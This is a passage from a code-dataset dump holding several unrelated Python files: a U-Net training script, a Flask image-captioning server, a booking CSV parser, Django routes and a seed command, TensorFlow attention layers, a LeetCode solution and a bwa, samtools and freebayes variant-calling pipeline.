total_loss.append(loss.item())\n loss.backward()\n optimizer.step()\n return np.mean(total_loss)\n\n\ndef evaluate(model, n_images):\n with torch.no_grad():\n dataset = KITTITrainingDataset(test_image_dir, test_target_dir)\n dataloader = DataLoader(dataset, batch_size=n_images, shuffle=False, num_workers=1)\n\n for i_batch, sample_batched in enumerate(dataloader):\n images, truths = Variable(sample_batched['image'].cuda()), Variable(sample_batched['target'].cuda())\n images = images.type(torch.cuda.FloatTensor)\n outputs = []\n targets = []\n\n for idx, output in enumerate(model(images)):\n target = truths[idx]\n topv_target, topi_target = target.type(torch.cuda.LongTensor).view(-1, n_classes).topk(1)\n target = topi_target.squeeze().detach()\n target = target.cpu().numpy()\n targets.append(target)\n\n # for prediction\n output = output.view(-1, n_classes)\n output = F.log_softmax(output, dim=-1)\n topv_output, topi_output = output.view(-1, n_classes).topk(1)\n output = topi_output.squeeze().detach()\n output = output.cpu().numpy()\n outputs.append(output)\n\n output_image = []\n target_image = []\n for i, item in enumerate(output):\n output_image.append(list(int_to_color[item]))\n target_image.append(list(int_to_color[target[i]]))\n output_image = np.array(output_image, dtype='uint8').reshape(image_height, imgage_width, 3) # int32 by defaulr\n target_image = np.array(target_image, dtype='uint8').reshape(image_height, imgage_width, 3)\n original_image = np.array(images[idx], dtype='uint8').reshape(image_height, imgage_width, 3)\n img_output = Image.fromarray(output_image, 'RGB')\n img_target = Image.fromarray(target_image, 'RGB')\n img_original = 
Image.fromarray(original_image, 'RGB')\n img_output.save(os.path.join(output_dir, 'output_' + dataset.file_names[idx]))\n img_target.save(os.path.join(output_dir, 'target_' + dataset.file_names[idx]))\n img_original.save(os.path.join(output_dir, 'original_' + dataset.file_names[idx]))\n\n matrix = confusion_matrix(np.array(targets)[0], np.array(outputs)[0])\n FP = matrix.sum(axis=0) - np.diag(matrix)\n FN = matrix.sum(axis=1) - np.diag(matrix)\n TP = np.diag(matrix)\n TN = matrix.sum(axis=0).sum() - (FP + FN + TP)\n IoU = np.asarray(TP / (TP + FP + FN))\n\n return IoU.mean()\n\n\ndef trainIters(model, learning_rate, weight_decay, batch_size, n_epochs=1):\n dataset = KITTITrainingDataset(training_image_dir, training_target_dir)\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)#, weight_decay=weight_decay)\n for i in range(n_epochs):\n loss = train(model, dataset, criterion, optimizer, batch_size)\n torch.save(model, 'model/model.pkl')\n print('Iter: {}, Loss: {}'.format(i, loss))\n\n\n\nif __name__ == '__main__':\n try:\n model = torch.load('model/model.pkl')\n except:\n model = Unet(n_classes).to(device)\n # Train a model\n trainIters(model, learning_rate=0.000001, weight_decay=0.0001, batch_size=1, n_epochs=20)\n\n # Test a model\n IoU = evaluate(model, n_images=3)\n print('IoU: ', IoU)\n\n","sub_path":"UNet.py","file_name":"UNet.py","file_ext":"py","file_size_in_byte":9790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"181898151","text":"#!/usr/bin/env python3\n# Copyright © 2020 BYTEPAL AI, LLC And Its Affiliates. All rights reserved.\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom parlai.scripts.interactive import setup_args\nfrom parlai.core.agents import create_agent\nfrom parlai.core.worlds import create_task\nfrom parlai.core.image_featurizers import ImageLoader\nfrom typing import Dict, Any\nimport json\nimport cgi\nimport PIL.Image as Image\nfrom base64 import b64decode, b64encode\nimport io\nimport os\nimport jsonpickle\nfrom flask import Flask, render_template, request, Response, jsonify, abort, send_file, make_response\nfrom mongoengine import *\nconnect('bytepal_db', host='localhost', port=27017)\n\nPORT = 8081\nSHARED: Dict[str, Any] = {}\nIMAGE_LOADER = None\napp = Flask(__name__)\n\n# I was thinking about the saving the images too but i won't do it for now\n# Schema to save the image captions based on the user\nclass Image_caption(Document):\n user_id = StringField()\n type = StringField()\n text = StringField()\n\n\n@app.route('/image_interact', methods=['POST', 'GET'])\ndef interact():\n if request.method == 'POST':\n # Reading the image\n image = request.files['image'].read()\n # Reading the personality\n personality = request.form.get('personality')\n # Reading the user id\n user_id = request.form.get('user_id')\n # Generating the caption\n model_response = interactive_running(image, personality)\n output = model_response[\"text\"]\n # Saving the user image caption in a MongoDB database\n user_caption = Image_caption(user_id=user_id, type=\"bot\", text=output) # I might not need to send body[\"type\"] i can just hardcode type = \"bot\"\n user_caption.save()\n # Output Response\n response = {\"user_id\":user_id, \"caption\":output, \"type\":\"bot\"}\n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n\n@app.route('/')\ndef hello():\n return \"Image Captioning Server Loading\"\n\n\ndef interactive_running(image, personality):\n reply = {}\n # Selecting the personality\n reply['text'] = personality\n print(\"personaliy is\", personality)\n # Reading the image\n image = Image.open(io.BytesIO(image)).convert('RGB')\n reply['image'] = SHARED['image_loader'].extract(image)\n SHARED['agent'].observe(reply)\n # Generating the caption\n model_res = SHARED['agent'].act()\n return model_res\n\n\ndef setup_interactive():\n parser = setup_args()\n opt = parser.parse_args()\n if not opt.get('model_file'):\n raise RuntimeError('Please specify a model file')\n if opt.get('fixed_cands_path') is None:\n opt['fixed_cands_path'] = os.path.join(\n '/'.join(opt.get('model_file').split('/')[:-1]), 'candidates.txt'\n )\n opt['task'] = 'parlai.agents.local_human.local_human:LocalHumanAgent'\n opt['image_mode'] = 'resnet152'\n SHARED['opt'] = opt\n SHARED['image_loader'] = ImageLoader(opt)\n\n # Create model and assign it to the specified task\n SHARED['agent'] = create_agent(opt, requireModelExists=True)\n SHARED['world'] = create_task(opt, SHARED['agent'])\n\n\n\nif __name__ == '__main__':\n setup_interactive()\n app.run(host=\"0.0.0.0\", debug=False, port=PORT)\n","sub_path":"ai_captioning/captioning_server.py","file_name":"captioning_server.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15753810","text":"#!/usr/bin/env python3\n#takes in a csv and returns a simplified table of only the interesting bits: date, booking#, name, charge\n##must change name of infile\n\n\nclass Booking():\n def process(self,thismo):\n infile = open(thismo+'.booking.csv') #split('+')\n\n lines = infile.readlines()\n infile.close()\n numb=len(lines)\n\n def thedate( arrn ):\n dated=arrn[4] #split('+')\n if ( len(dated.split('/')) == 3 ):\n dated=dated.split('/')\n if ( int(dated[0]) < 10 ):\n if ( int(dated[1]) < 10 ):\n nd=dated[2]+\"-0\"+dated[0]+\"-0\"+dated[1]\n else:\n nd=dated[2]+\"-0\"+dated[0]+\"-\"+dated[1]\n else:\n if ( int(dated[1]) < 10 ):\n nd=dated[2]+\"-\"+dated[0]+\"-0\"+dated[1]\n else:\n nd=dated[2]+\"-\"+dated[0]+\"-\"+dated[1]\n\n if nd.split(\"-\")[0] == \"15\": ## only accounts for 2015 dates\n sp=nd.split(\"-\")\n nd=\"20\"+sp[0]+\"-\"+sp[1][-2:]+\"-\"+sp[2][-2:]\n\n if ( len(nd.split(\"-\")) == 3 ):\n nd = nd.split(\" \")[0]\n return nd\n else:\n print(dated)\n print(arrn)\n\n def thebook( arrn ):\n booked=arrn[0]\n return booked\n\n def thename( arrn ):\n named=arrn[3] #split('+')\n if ( named == \"; \" ):\n lastfirst=arrn[2].split(',')\n firstlast=lastfirst[1]+\" \"+lastfirst[0]\n named=firstlast\n named=named.lower()\n return named\n\n def themony( arrn ):\n moneyd=arrn[7] #split('+')\n moneyd=moneyd[4:]\n return moneyd\n\n tosrt=[\"\"]\n for i, item in enumerate(lines):\n spli=lines[i].split('+')\n if ( spli[6] == \"ok\" ):\n td=thedate(spli)\n tb=thebook(spli)\n tn=thename(spli)\n tm=themony(spli)\n if ( td ):\n trb=td+\"+\"+tb+\"+\"+str(tn)+\"+\"+str(tm)\n tosrt.append(trb)\n sortd=\"\\n\".join(sorted(tosrt))\n return sortd\n\n#shagb = Booking().process()\n#print(shagb)\n\n","sub_path":"commcomp/booking.py","file_name":"booking.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
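The hand-rolled zero-padding in thedate() above can be expressed with the standard library. A sketch that accepts the two-digit and four-digit year forms the record handles (the exact input formats are an assumption based on the sample data):

from datetime import datetime

def iso_date(raw):
    # Try two-digit years first ('3/7/15'), then four-digit ('3/7/2015').
    for fmt in ('%m/%d/%y', '%m/%d/%Y'):
        try:
            return datetime.strptime(raw.split(' ')[0], fmt).strftime('%Y-%m-%d')
        except ValueError:
            continue
    return None

print(iso_date('3/7/15'))  # -> 2015-03-07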
+{"seq_id":"65390544","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.post_list, name='post_list'),\n # path('', views.translate_link, name='translate_link'),\n path('post/<int:pk>/', views.post_detail, name='post_detail'),\n path('post/new/', views.post_new, name='post_new'),\n path('post/<int:pk>/edit/', views.post_edit, name='post_edit'),\n\n]\n# assign a view called post_list to root url\n# if link is blank (root url : http://127.0.0.1:8000/), go to view post_list\n# post_list is the name of the url that will be used to identify the view\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"82934542","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\nfrom website.models import Product, Category, PurchaseOrder\n\n\n# Create default instances using the app's models\n\ncategory_list = [\n Category(1, 'Appliances'),\n Category(2, 'Bedroom Furniture')\n]\n\nproduct_list = [\n Product(\n '7891234123459', None, 'Bread toaster', 'Lorem ipsum',\n 'bread_toaster.jpg', 35.999, category_list[0].id\n ),\n Product(\n '2012345012349', None, 'Wardrobe', 'Lorem ipsum',\n 'wardrobe.jpeg', 55.990, category_list[1].id\n ),\n Product(\n '5901234123457', None, 'Mattress', 'Lorem ipsum',\n 'mattress.jpg', 800.724, category_list[1].id\n )\n]\n\nuser = User.objects.first()\n\npurchase_order_list = [\n PurchaseOrder(timestamp=timezone.now(), user=user, cart=False),\n PurchaseOrder(timestamp=timezone.now(), user=user, cart=False),\n PurchaseOrder(timestamp=timezone.now(), user=user, cart=False),\n]\n\n\nclass Command(BaseCommand):\n\n def _create_tags(self):\n\n Category.objects.all().delete()\n Category.objects.bulk_create(category_list)\n\n Product.objects.all().delete()\n for product in product_list:\n product.save()\n\n PurchaseOrder.objects.all().delete()\n PurchaseOrder.objects.bulk_create(purchase_order_list)\n\n def handle(self, *args, **options):\n self._create_tags()\n","sub_path":"website/management/commands/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
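The seeding command above deletes and recreates rows on every run, which churns primary keys. A hypothetical idempotent variant using Django's update_or_create, assuming the Category label field is named name (a sketch only, not the record's method):

# Re-running leaves existing rows, and any foreign keys pointing at them, intact.
def _create_categories(self):
    for pk, name in [(1, 'Appliances'), (2, 'Bedroom Furniture')]:
        Category.objects.update_or_create(pk=pk, defaults={'name': name})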
+{"seq_id":"109081566","text":"import tensorflow as tf\n\nclass Layers:\n def __init__(self,config):\n self.config = config\n\n def X_input(self):\n X = tf.placeholder(shape=(None,self.config['model']['max_sent_len']),dtype='int32')\n tf.add_to_collection('senti_X_id',X)\n return X\n\n def attr_Y_input(self):\n attr_Y = tf.placeholder(shape=(None,self.config['model']['attr_num']),dtype='int32')\n tf.add_to_collection('attr_Y',attr_Y)\n return attr_Y\n\n def senti_Y_input(self):\n senti_Y = tf.placeholder(shape=(None,self.config['model']['attr_num'],self.config['model']['senti_num']),dtype='int32')\n tf.add_to_collection('senti_Y',senti_Y)\n return senti_Y\n\n def char_X_input(self):\n X = tf.placeholder(shape=(None, self.config['model']['max_sent_len'],self.config['model']['max_word_len']),dtype='int32')\n tf.add_to_collection('senti_char_X_id',X)\n return X\n\n def padded_word_mask(self,X_id):\n \"\"\"\n\n :param X_id: (batch size, max sent len)\n :return: (batch size, max sent len, word dim)\n \"\"\"\n X_id = tf.cast(X_id, dtype='float32')\n padding_id = tf.ones_like(X_id, dtype='float32') * self.config['model']['padding_word_index']\n is_padding = tf.equal(X_id, padding_id)\n mask = tf.where(is_padding, tf.zeros_like(X_id, dtype='float32'), tf.ones_like(X_id, dtype='float32'))\n mask = tf.tile(tf.expand_dims(mask, axis=2), multiples=[1, 1, self.config['model']['word_dim']])\n return mask\n\n def word_embedding_table(self):\n table = tf.placeholder(shape=(self.config['model']['vocab_size'], self.config['model']['word_dim']),dtype=\"float32\")\n tf.add_to_collection('table', table)\n embedding = tf.Variable(table)\n return embedding\n\n def padded_char_mask(self, char_X_id):\n \"\"\"\n\n :param char_X_id: (batch size, max sent len, max word len)\n :return: (batch size, max sent len, max word len, char dim)\n \"\"\"\n char_X_id = tf.cast(char_X_id,dtype='float32')\n padding_id = tf.ones_like(char_X_id, dtype='float32') * self.config['model']['padding_char_index']\n is_padding = tf.equal(char_X_id, padding_id)\n mask = tf.where(is_padding, tf.zeros_like(char_X_id, dtype='float32'), tf.ones_like(char_X_id, dtype='float32'))\n mask = tf.tile(tf.expand_dims(mask, axis=3), multiples=[1, 1, 1, self.config['model']['char_dim']])\n return mask\n\n\n def char_embedding_table(self):\n table = tf.placeholder(shape = (self.config['model']['char_vocab_size'],self.config['model']['char_dim']),dtype='float32')\n tf.add_to_collection('char_table',table)\n char_embedding = tf.Variable(table)\n return char_embedding\n\n def lookup(self,X_id,table,mask):\n \"\"\"\n\n :param X_id: (batch size, max sent len) / (batch size, max sent len, max char len)\n :param mask: used to prevent update of padded words\n :return:\n \"\"\"\n X = tf.nn.embedding_lookup(table, X_id, partition_strategy='mod', name='lookup_table')\n X = tf.multiply(X,mask)\n return X\n\n def parameter_initializer(self,shape,dtype='float32'):\n stdv=1/tf.sqrt(tf.constant(shape[-1],dtype=dtype))\n init = tf.random_uniform(shape,minval=-stdv,maxval=stdv,dtype=dtype,seed=1)\n return init\n\n def sequence_length(self,X_id,padding_index):\n \"\"\"\n\n :param X_id: (batch size, max sentence len) / (batch size, max sentence len, max word len)\n :return:\n \"\"\"\n padding_id = tf.ones_like(X_id, dtype='int32') * padding_index\n condition = tf.equal(padding_id, X_id)\n seq_len = tf.reduce_sum(tf.where(condition, tf.zeros_like(X_id, dtype='int32'), tf.ones_like(X_id, dtype='int32')),axis=-1)\n return seq_len\n\n def biSRU(self,X,seq_len,dim,name=''):\n 
\"\"\"\n\n :param X: (batch size, max sent len, word dim)\n :param seq_len: (batch size,)\n :param name:\n :return: (batch size, max sent len, rnn dim)\n \"\"\"\n with tf.variable_scope('biSRU_'+name, reuse=tf.AUTO_REUSE):\n # define parameters\n fw_cell = tf.contrib.rnn.SRUCell(\n dim / 2\n )\n bw_cell = tf.contrib.rnn.SRUCell(\n dim / 2\n )\n\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=fw_cell,\n cell_bw=bw_cell,\n inputs=X,\n sequence_length=seq_len,\n dtype=tf.float32)\n\n outputs = tf.concat(outputs, axis=-1)\n return outputs\n\n def max_pooling(self,X,mask):\n \"\"\"\n\n :param X: (batch size, max sentence len, max word len, char dim)\n :param mask: binary mask (batch size, max sent len, max word len, char dim)\n :return: (batch size, max sent len, char dim)\n \"\"\"\n condition = tf.equal(mask,tf.ones_like(mask)*self.config['model']['padding_char_index'])\n # -inf mask\n mask = tf.where(condition,tf.ones_like(mask)*(-float('inf')),tf.zeros_like(mask))\n X = tf.add(X,mask)\n # (batch size, max sent len, char dim)\n X = tf.reduce_max(X,axis=-2)\n condition = tf.is_inf(X)\n X = tf.where(condition,tf.zeros_like(X),X)\n return X\n\n def attr_matrix(self,name=''):\n \"\"\"\n\n :return: (attr num, rnn dim)\n \"\"\"\n A = tf.get_variable(name='attr_matrix_'+name,\n initializer=self.parameter_initializer(shape=(self.config['model']['attr_num'],self.config['model']['biSRU']['rnn_dim'])),\n dtype='float32')\n # norm = tf.contrib.layers.l2_regularizer(self.config['model']['reg_rate'])(A)\n # tf.add_to_collection('reg', norm)\n return A\n\n def attention(self,A,X,X_id):\n \"\"\"\n\n :param A: (attr num, rnn dim)\n :param X: (batch size, max sentence len, rnn dim)\n :param X_id: (batch size, max sentence len)\n :return: (batch size, attr num, max sent len)\n \"\"\"\n X_id = tf.cast(X_id, dtype='float32')\n padding_id = tf.ones_like(X_id, dtype='float32') * self.config['model']['padding_word_index']\n is_padding = tf.equal(X_id, padding_id)\n # (batch size, max sentence len)\n mask = tf.where(is_padding,\n tf.zeros_like(X_id, dtype='float32'),\n tf.ones_like(X_id, dtype='float32'))\n # (batch size, max sentence len, attr num)\n temp = tf.clip_by_value(tf.tensordot(X,A,axes=[[2],[1]]),\n clip_value_min=tf.constant(-self.config['model']['clip_value']),\n clip_value_max=tf.constant(self.config['model']['clip_value']))\n # (attr num, batch size, max sent len)\n temp = tf.transpose(temp,perm=(2,0,1))\n temp = tf.multiply(mask,tf.exp(temp))\n # (attr num, batch size, 1)\n denominator = tf.reduce_sum(temp, axis=2, keepdims=True)\n # (attr num, batch size, max sent len)\n denominator = tf.tile(denominator,multiples=[1,1,self.config['model']['max_sent_len']])\n # (attr num, batch size, max sent len)\n att = tf.truediv(temp,denominator)\n # (batch size, attr num, max sent len)\n att = tf.transpose(att,perm=(1,0,2))\n return att\n\n def sent_repr(self,att,X):\n \"\"\"\n\n :param att: (batch size, attr num, max sent len)\n :param X: (batch size, max sent len, rnn dim)\n :return:(batch size, attr num, rnn dim)\n \"\"\"\n # (batch size, attr num, rnn dim)\n sent_repr = tf.matmul(att,X)\n return sent_repr\n\n def senti_score(self,sent_repr):\n \"\"\"\n\n :param sent_repr: (batch size, attr num, sep bisru layers num * rnn dim)\n :return: (batch size, attr num, senti num)\n \"\"\"\n # (senti num, rnn dim)\n W = tf.get_variable(name='senti_score_W',initializer=self.parameter_initializer(shape=(self.config['model']['senti_num'],\n self.config['model']['biSRU']['separated_layers_num']*\n 
self.config['model']['biSRU']['rnn_dim']),\n dtype='float32'))\n norm = tf.contrib.layers.l2_regularizer(self.config['model']['reg_rate'])(W)\n tf.add_to_collection('reg',norm)\n # (batch size, attr num, senti num)\n score = tf.tensordot(sent_repr,W,axes=[[2],[1]])\n\n return score\n\n def senti_prediction(self,score):\n \"\"\"\n\n :param score: (batch size, attr num, senti num)\n :return:\n \"\"\"\n # (batch size, attr num, senti num)\n temp = tf.nn.softmax(score,axis=-1)\n senti_pred = tf.where(tf.equal(tf.reduce_max(temp, axis=2, keep_dims=True), temp), tf.ones_like(temp),\n tf.zeros_like(temp))\n return senti_pred\n\n def senti_loss(self,logits,labels):\n \"\"\"\n\n :param logits: (batch size, attr num, senti num)\n :param labels: (batch size, attr num, senti num)\n :return:\n \"\"\"\n reg = tf.get_collection('reg')\n loss = tf.reduce_mean(tf.add(\n tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits_v2(labels=labels, logits=logits, dim=-1), axis=1),\n tf.reduce_sum(reg)))\n return loss","sub_path":"base_withCharEmb/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
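The attention() method in the layers.py record implements a masked softmax: exponentiated scores at padded positions are zeroed before normalisation, so padding never receives attention weight. The same arithmetic in plain numpy (shapes and the padding index are illustrative):

import numpy as np

def masked_attention(X, A, X_id, padding_index=0):
    # X: (batch, sent_len, dim), A: (attr_num, dim), X_id: (batch, sent_len)
    mask = (X_id != padding_index).astype(np.float32)   # 1.0 at real tokens
    scores = np.einsum('bsd,ad->bas', X, A)             # (batch, attr_num, sent_len)
    weights = np.exp(scores) * mask[:, None, :]         # zero out padded positions
    weights /= weights.sum(axis=-1, keepdims=True)      # renormalise per attribute
    return weights

att = masked_attention(np.random.rand(2, 5, 4), np.random.rand(3, 4),
                       np.array([[1, 2, 3, 0, 0], [4, 5, 0, 0, 0]]))
print(att.shape)  # (2, 3, 5); each row sums to 1 over the unpadded tokens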
+{"seq_id":"361151163","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if not nums: return 0\n tmp = nums[0]\n counter = 0\n for i in range(1,len(nums)):\n if nums[i] != tmp:\n tmp = nums[i]\n counter += 1\n nums[counter] = tmp\n return counter + 1\n","sub_path":"Week01/remove-duplicates-from-sorted-array.py","file_name":"remove-duplicates-from-sorted-array.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
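The two-pointer dedup above rewrites nums in place and returns the new logical length. A quick usage check, assuming the class is importable:

nums = [1, 1, 2, 2, 3]
n = Solution().removeDuplicates(nums)
print(n, nums[:n])  # 3 [1, 2, 3]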
+{"seq_id":"132865946","text":"import getopt, sys, os\nimport subprocess\nfrom os import path\n\ndef variant_discoverer(first_coordinate, last_coordinate, max_read_len, rDNA_unit_size):\n\t#change file to linux format\n\tprocess_cat = subprocess.Popen(['cat', ref_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\twith open ('fixed.fasta', 'w') as fixedfile:\n\t\tsubprocess.Popen(['tr', '-d', '\\'\\\\r\\''], stdin=process_cat.stdout, stdout=fixedfile, stderr=subprocess.PIPE).wait()\n\t#trim reference file\n\tsubprocess.Popen([python, 'fasta_trimmer.py', 'fixed.fasta', 'ref_trm.fasta', '{0}'.format(first_coordinate), '{0}'.format(last_coordinate)]).wait()\n\t#Index fasta with bwa\n\ttry:\n\t\tsubprocess.Popen(['bwa', 'index', 'ref_trm.fasta'], stderr=subprocess.PIPE).wait()\n\texcept OSError:\n\t\tprint('Error10: Cannot find bwa.')\n\t\tsys.exit(2)\n\t#Index fasta with samtool\n\ttry:\n\t\tsubprocess.Popen(['samtools', 'faidx', 'ref_trm.fasta'], stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error11: Cannot find samtools.')\n\t\tsys.exit(2)\n\t#Map the reads with bwa\n\tprocess_align_reads = subprocess.Popen(['bwa', 'mem', 'ref_trm.fasta', fwd_reads_file, rvs_reads_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#filter unmapped reads with samtools\n\tprocess_filter_unmapped_reads = subprocess.Popen(['samtools', 'view', '-h', '-F', '4'], stdin=process_align_reads.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#filter reads with soft clippings with software available at https://github.com/tseemann/samclip\n\ttry:\n\t\tprocess_filter_softclipped_reads = subprocess.Popen(['samclip', '--ref', 'ref_trm.fasta', '--max', '0'], stdin=process_filter_unmapped_reads.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error12: Cannot find samclip.')\n\t\tsys.exit(2)\n\t#Convert file to BAM format for the next tool\n\twith open ('bamfile.bam', 'w') as bamfile:\n\t\tsubprocess.Popen(['samtools', 'view', '-bS'], stdin=process_filter_softclipped_reads.stdout, stdout=bamfile, stderr=subprocess.PIPE).wait()\n\t#Use Prithika's new Python tool to convert CIGAR strings to CIGAR2 strings software available from Prithika\n\tsubprocess.Popen([python, 'fat-cigar.py', 'linear', 'bamfile.bam', 'CG2.bam'], stderr=subprocess.PIPE).wait()\n\t#Convert the BAM files back to SAM format for CIGAR2 filtering\n\twith open ('CG2.sam', 'w') as samfile:\n\t\tsubprocess.Popen(['samtools', 'view', '-h', 'CG2.bam'], stdout=samfile, stderr=subprocess.PIPE).wait()\n\t#Copy header from the sam file\n\twith open ('ch.sam', 'w') as chfile:\n\t\tsubprocess.Popen(['samtools', 'view', '-H', 'CG2.sam'], stdout=chfile, stderr=subprocess.PIPE)\n\t#CIGAR2 filtering - only keep reads if they they have at least 20 nucleotide matches at each end of the read\n\twith open ('filtered.sam', 'w') as filteredfile:\n\t\tsubprocess.Popen(['awk', '($6 ~ /^[2-9][0-9]=.*[2-9][0-9]=$/) || ($6 ~ /^[2-9][0-9]=.*1[0-9]{2}=$/) || ($6 ~ /^1[0-9]{2}=.*[2-9][0-9]=$/) || ($6 ~ /^[1-9][0-9]{1,2}=$/)', 'CG2.sam'], stdout=filteredfile, stderr=subprocess.PIPE).wait()\n\t#Add the header to the CIGAR2-filtered files as the filtering step lost it\n\tprocess_add_header = subprocess.Popen(['cat', 'ch.sam', 'filtered.sam'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#Convert the CIGAR2-filtered SAM files to BAM format\n\twith open ('back.bam', 'w') as bamfile:\n\t\tif float(sub_sample) < 1.0:\n\t\t\tsubprocess.Popen(['samtools', 'view', '-bS', '-s', sub_sample], stdin=process_add_header.stdout, 
stdout=bamfile, stderr=subprocess.PIPE).wait()\n\t\telse:\n\t\t\tsubprocess.Popen(['samtools', 'view', '-bS'], stdin=process_add_header.stdout, stdout=bamfile, stderr=subprocess.PIPE).wait()\n\t#Stack the filtered reads under the reference - up to maximum depth using freebayes\n\twith open ('vcfile.vcf', 'w') as vcfile:\n\t\ttry:\n\t\t\tsubprocess.Popen(['freebayes', '-f', 'ref_trm.fasta', '-F', '0.001', '--pooled-continuous', 'back.bam'], stdout=vcfile, stderr=subprocess.PIPE).wait()\n\t\texcept OSError:\n\t\t\tprint('Error13: Cannot find freebayes.')\n\t\t\tsys.exit(2)\n\t#Break multi-allelic sites\n\ttry:\n\t\tprocess_breakmulti = subprocess.Popen(['vcfbreakmulti', 'vcfile.vcf'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error14: Cannot find vcflib.')\n\t\tsys.exit(2)\n\t#Decompose biallelic sites\n\tprocess_allelicprimitives = subprocess.Popen(['vcfallelicprimitives', '-kg'], stdin=process_breakmulti.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#Fix the field of alternate allelic depth\n\tprocess_fix_depth = subprocess.Popen(['./vcf_ad_fix.sh'], stdin=process_allelicprimitives.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#normalise the vcf\n\ttry:\n\t\tprocess_normalise = subprocess.Popen(['bcftools', 'norm', '-f', 'ref_trm.fasta', '-m-'], stdin=process_fix_depth.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error15: Cannot find bcftools.')\n\t\tsys.exit(2)\n\t#relocate variants\n\tsubprocess.Popen([python, 'variant_relocator.py', 'relocated.vcf', str(max_read_len), str(rDNA_unit_size+max_read_len-1), '0'], stdin=process_normalise.stdout, stderr=subprocess.PIPE).wait()\n\t#sort variants\n\twith open ('sorted.vcf', 'w') as sortedfile: #file object to write on the file\n\t\tsubprocess.Popen(['bcftools', 'sort', 'relocated.vcf'], stdout=sortedfile, stderr=subprocess.PIPE).wait()\n\t#unify decomposed variants\n\tsubprocess.Popen([python, 'variant_unifier.py', 'sorted.vcf', 'unified.vcf', '1']).wait()\n\t#unify relocated variants\n\tsubprocess.Popen([python, 'variant_unifier.py', 'unified.vcf', 'unified2.vcf', '0']).wait()\n\t#filter variants\n\twith open ('filtered.vcf', 'w') as filteredfile: #file object to write on the file\n\t\tsubprocess.Popen(['vcffilter', '-f', 'AO > 1 & AO / DP > 0.005', 'unified2.vcf'], stdout=filteredfile, stderr=subprocess.PIPE) #filtering the variants\n\t#retrieve frquency\n\tsubprocess.Popen([python, 'frequency_retriever.py', str(max_read_len-1), str(rDNA_unit_size), out_vcf]).wait()\n\n#function to delete all intermediate files\ndef delete_all_interim_files():\n\t#delete interim reference file\n\tsubprocess.Popen(['rm', 'fixed.fasta'])\n\t#deleting the fat-cigar bam file\n\tsubprocess.Popen(['rm', 'CG2.bam'])\n\t#deleting the fat-cigar sam file\n\tsubprocess.Popen(['rm', 'CG2.sam'])\n\t#delete header of sam\n\tsubprocess.Popen(['rm', 'ch.sam'])\n\t#delete sam without header\n\tsubprocess.Popen(['rm', 'filtered.sam'])\n\t#delete fat-cigar filtered bam file\n\tsubprocess.Popen(['rm', 'back.bam'])\n\t#delete vcf file\n\tsubprocess.Popen(['rm', 'vcfile.vcf'])\n\t#delete relocated vcf file\n\tsubprocess.Popen(['rm', 'relocated.vcf'])\n\t#delete sorted vcf file\n\tsubprocess.Popen(['rm', 'sorted.vcf'])\n\t#delete unified vcf file\n\tsubprocess.Popen(['rm', 'unified.vcf'])\n\t#delete unified2 vcf\n\tsubprocess.Popen(['rm', 'unified2.vcf'])\n #delete bam file\n\tsubprocess.Popen(['rm', 'bamfile.bam'])\n\t#delete sorted bam file\n\tsubprocess.Popen(['rm', 
'bamfile_sorted.bam'])\n\t#delete index of sorted bam file\n\tsubprocess.Popen(['rm', 'bamfile_sorted.bam.bai'])\n\t#delete head removed vcf\n\tsubprocess.Popen(['rm', 'vcf_hr.vcf'])\n\t#delete the trimmed reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta'])\n\t#delete the amb index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.amb'])\n\t#delete the ann index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.ann'])\n\t#delete the bwt index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.bwt'])\n\t#delete the fai index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.fai'])\n\t#delete the pac index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.pac'])\n\t#delete the sa index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.sa'])\n\t#delete relocated frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'relocated_fr.vcf'])\n\t#delete sorted frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'sorted_fr.vcf'])\n\t#delete unified frequency retrieved 